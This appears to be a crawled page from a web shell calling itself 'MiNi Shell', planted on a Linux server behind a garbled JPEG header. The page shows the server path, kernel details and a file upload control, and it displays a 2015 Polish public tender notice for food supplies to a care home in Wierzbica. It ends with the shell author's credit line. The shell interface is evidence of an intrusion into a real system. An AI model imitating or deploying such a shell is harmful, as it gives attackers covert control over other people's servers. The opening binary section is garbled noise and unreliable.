JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151201/326204-N-2015.html

<p class="kh_header"><b>Wierzbica: DOSTAWA  ARTYKUŁÓW SPOŻYWCZYCH</b><br>
<b>Numer ogłoszenia: 326204 - 2015; data zamieszczenia: 01.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Sienkiewicza 37, 26-680 Wierzbica, woj. mazowieckie, tel. 048 6182059, faks 048 6182059.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.wierzbica.finn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA  ARTYKUŁÓW SPOŻYWCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i rozładunek artykułów spożywczych do DPS w Wierzbicy ul. Sienkiewicza 37. 
Zamówienie zostało podzielone na części:
Część I	
CPV 15100000-9   produkty zwierzęce, mięso i produkty mięsne					
Część II 
CPV 15800000-6 różne produkty spożywcze
Część III
CPV 15500000-3 produkty mleczarskie
Część IV 
CPV 158100009 - pieczywo świeże i wyroby piekarskie
Część V 
CPV 15200000 - 0 ryby przetworzone i konserwowane.
Część VI 
CPV 15300000-1 owoce, warzywa i podobne produkty.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.80.00.00-6, 15.50.00.00-3, 15.81.00.00-9, 15.20.00.00-0, 15.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca   potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 3)

Weryfikacja  spełnienia wyżej wymienionego warunku dokonana zostanie zgodnie z formułą spełnia -nie spełnia w oparciu o dostarczone oświadczenie. Prawidłowo złożony dokument - spełnia, brak dokumentu, bądź błędnie złożony - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca  potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 3)

Weryfikacja  spełnienia wyżej wymienionego warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o złożone oświadczenie. Prawidłowo złożony dokument - spełnia, brak dokumentu, bądź błędnie złożony - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca  potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 3)

        Weryfikacja  spełnienia wyżej wymienionego warunku dokonana zostanie zgodnie z formułą spełnia - nie  spełnia w oparciu o złożone oświadczenie. Prawidłowo złożony dokument - spełnia, brak dokumentu, bądź błędnie złożony - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca  potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 3)
        
        Weryfikacja  spełnienia wyżej wymienionego warunku dokonana zostanie zgodnie z formułą spełnia - nie  spełnia w oparciu o złożone oświadczenie. Prawidłowo złożony dokument - spełnia, brak dokumentu, bądź błędnie złożony - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca  potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 3)
        
        Weryfikacja  spełnienia wyżej wymienionego warunku dokonana zostanie zgodnie z formułą spełnia- nie  spełnia w oparciu o złożone oświadczenie. Prawidłowo złożony dokument - spełnia, brak dokumentu, bądź błędnie złożony - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz posiadanych do wykonania zamówienia środków transportu z potwierdzeniem dopuszczenia do przewozu żywności przez SANEPID</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.wierzbica.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Domu Pomocy Społecznej
				     ul. Sienkiewicza 37
				     26-680 Wierzbica
	         w dziale administracyjno-gospodarczym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2015 godzina 11:00, miejsce: Domu Pomocy Społecznej
				     ul. Sienkiewicza 37
				     26-680 Wierzbica
	         w dziale administracyjno-gospodarczym.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baleron	
kg	
20

Baleron mielony	
kg	
180

Baton drobiowy szynkowy	
kg	
85

Blok zapiekany	
kg	
180

Boczek mielony (wędlina)	
kg	
170

Farsz na pierogi	
kg	
15

Karkówka z kością	
kg	
420

Kaszanka	
kg	
250

Kiełbasa krakowska	
kg	
206

Kiełbasa szynkowa	
kg	
225

Kiełbasa toruńska	
kg	
150

Kiełbasa wiejska	
kg	
3

Kiełbasa zwykła	
kg	
240

Kiełbasa gilowa	
kg	
470

Kiełbasa serwolatka	
kg	
170

Kości wieprzowe (rurkowe)	
kg	
1 100

Kurczaki	
kg	
890

Łopatka z kością	
kg	
900

Mielonka wieprzowa (wędlina na kanapki)	
kg	
180

Mięso mielone (wieprzowe)	
kg	
206

Mortadel	
kg	
250

Ogonówka wędzona	
kg	
55

Parówki	
kg	
220

Parówkowa	
kg	
220

Kiełbasa golonkowa	
kg	
150

Pasztet wieprzowy	
kg	
250

Pasztetowa	
kg	
225

Pieczeń rzymska	
kg	
180

Płuca wieprzowe	
kg	
100

Schab drobiowy	
kg	
165

Kiełbasa szynkówka	
kg	
150

Serca drobiowe	
kg	
45

Słonina	
kg	
56

Smalec	
kg	
50

Szynka wieprzowa (wędlina)	
kg	
10

Szynka tyrolska	
kg	
150

Wątróbka drobiowa	
kg	
200

Wołowina z kością - rozbrat	
kg	
170

Żebra wieprzowe	
kg	
200

Kiełbasa żywiecka	
kg	
232

Serca wieprzowe	
kg	
190

Żołądki drobiowe	
kg	
160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Barszcz biały w proszku opakowanie 66 g	
szt	 
900

Budyń (op. 40 g)	
szt	
1000

Bułka tarta 	
kg	
200

Chrzan w słoiku (op. 290g)	
szt	
380

Cukier 	
kg	
2 400

Cukier puder	
kg	
8

Cukier waniliowy (op. 32g)	
szt	
150

Cynamon (op. 20g)	
szt	
15

Ćwikła (słoik 250 g)	
szt	
20

Drożdże (op. 100 g)	
szt	
10

Dżem niskosłodzony (op.260 g)	
szt	
450

Galaretka owocowa (op. 75 g)	
szt	
20
Groszek konserwowy (puszka lub słoik 400g)	
szt	
200

Herbata (granulat op. 100g)	
szt	
1 100

Kakao (op. 100 g)	
szt	
75

Kasza gryczana 	
kg	
80

Kasza jęczmienna 	
kg	
150

Kasza manna	
kg	
180
Kawa zbożowa rozpuszczalna (op.150 g)	
szt	
140

Ketchup (op 1 litr)	
szt	
150

Kisiel (op. 40g)	
szt	
1200

Koncentrat pomidorowy (op. 0,9 l)	szt	
250

Krem do ciast (op. 250g)	
szt	
10

Kwasek cytrynowy (op. 25g)	
szt	
450
Liście laurowe (op. 10g)	
szt	
40
Majeranek (op. 10g)	
szt	
100
Majonez (op. 1l)	
szt	
250
Mak (op. 1 kg)	
szt	
8
Makaron świderki (op. 5 kg)	
szt	
75
Makaron nitki (op. 5kg)	
szt	
35
Margaryna	
kg	
10
Mąka pszenna (op. 5kg)	
szt	
170
Mąka ziemniaczana (op. 1 kg)	
kg	
150
Miód naturalny (op. 1 l)	
szt	
50
Musztarda (op. 1 l)	
szt	
133
Ocet (op. 1l)	
szt	
10
Olej uniwersalny (op. 5 l)	
szt	
100
Olejek do ciast  (op. 10g)	
szt	
15
Pieprz mielony (op. 15g)	
szt	
550
Płatki jęczmienne (op. 400g)	
szt	
280

Płatki kukurydziane 1 kg	
kg	
220

Płatki owsiane 	
kg	
130

Polewa czekoladowa (op. 100g)	
szt	
6

Proszek do pieczenia (op. 30g)	
szt	
100

Przyprawa warzywna (op. 1 kg) 	
szt	
80
Przyprawa do potraw w płynie (op. 1 l)	
szt	
20
Rodzynki (op. 1kg)	szt	2


Ryż 	
kg	
430

Sok owocowo-warzywny zagęszczany w butelce  (op. 1 l)	

szt	

1000

Sól 	
kg	
420
Syrop owocowy wysokosłodzony (op. 0,50l) 	
szt	
1800

Ziele angielskie (op. 15 g)	
szt	
50

Zioła prowansalskie (op 10g)	
szt 	
30

Żelatyna (op 50g)	
szt	
15

Bazylia  (op. 10g)	
szt	
15

Tymianek (op 10g)	
szt	
30

Oregano (op. 10g)	
szt	
30

Przyprawa do kurczaka (op.20g)	
szt	
60

Przyprawa do wieprzowiny (20g)	
szt	
30

Papryka słodka (op.20g)	
szt	
30

Papryka ostra (op20g)	
szt	
30

Pieprz ziołowy (20g)	
szt	
30

Curry (op. 25g)	
szt	
50

Wafle śmietankowe (180 g)	
szt	
60

Herbatniki (65 g)	
szt	
60

Biszkopty (100g)	
szt	
60

Paluszki ( 80g)	
szt	
60

Baton MARS (op. 47 g)	
szt	
75.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	
Mleko 2 %	
litr	  
24 000

2.	
Ser biały półtłusty	
kg	
700

3.	
Ser twardy	
kg	
250

4.	
Serek homogenizowany (op. 150g)	
szt	
3 100

5.	
Serek topiony (op. 100g) 	
szt	
2 500

6.	
Śmietana 18% (op. 400g)	
szt	
2 350

7.	
Masło extra kostka 200g	
szt	
6 400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pieczywo świeże i wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	
Bułka pszenna (50g)	
szt	
18 300

2.	
Bułka pszenna (400g) (gryzka)	
szt	
5 856

3.	
Chleb pszenno-żytni - krojony (600 g)	
szt	
14 100


4.	
Chleb graham - krojony (500 g)	
szt	
3 660.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ryby przetworzone i konserwowane..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	
Filet z miruny ze skórą	
kg	
500

2.	
Paprykarz szczeciński (op. 330g)	
szt	
325

3.	
Śledź salinat	
kg	
110

4.	
Śledź w oleju (op. 170g)	
sz	
150

5.	
Śledź w pomidorach (op.170g)	
szt	
250

6.	
Szprot w oleju (op.170g)	
szt	
250

7.	
Szprot w pomidorach (op. 170g)	
szt	
350

8.	
Ryba wędzona (makrela)	
kg	
36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> owoce, warzywa i podobne produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	
Arbuz	
kg	
150

2	
Banany 	
kg	
36

3	
Botwina	
Pęczki	
80

4	
Buraki	
kg	
1 150

5	
Brokuły	
szt	
60

6	
Cebula	
kg	
600

7	
Cytryny	
kg	          6

8	
Fasola biała	
kg	
100

9	
Fasola szparagowa	kg	
20

10	
Groch łupany	
kg	
80
11
	
Grzyby suszone	
kg	
0,5

12	
Jabłka	
kg	
2 200

13	
Kalafior	
szt	
150
14	
Kapusta biała	
kg	
3 000
15	
Kapusta granatowa	
kg	
350
16	
Kapusta kiszona	
kg	
200
17	
Kapusta pekińska	
kg	
400

18	
Kapusta młoda	
kg	
120

19	
Kapusta włoska	
kg	
700

20	
Koper	
pęczki	
200

21	
Mandarynki	
kg	
30

22	
Marchew	
Kg	
2 600

23	
Ogórek świeży	
Kg	
450

24	
Ogórki kiszone	
Kg	
360

25	
Papryka	
Kg	
50

26	
Pieczarki	
kg	
250

27	
Pietruszka	
kg	
550

28	
Pietruszka  zielona	
pęczki	
100


29	
Pomidory	
kg	350

30	
Por	
kg	120


31	
Rzodkiewka	
pęczki	
120

31	
Sałata zielona	
szt	
600

32	
Seler	
kg	
550

33	
Susz  owocowy -  jabłko	
Kg	
5

34	
Susz owocowy- śliwka	
kg	
5

35	
Susz owocowy - gruszka	
Kg	
5

36	
Susz warzywny (5 kg)	
szt	
12

37	
Szczaw	
pęczki	
40
38	
Szczypior	
pęczki	
50
39	
Śliwka	
kg	
150

40	
Truskawka	
kg	
50

41	
Wiśnia	
kg	
150

42	
Ziemniaki	
kg	
16 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com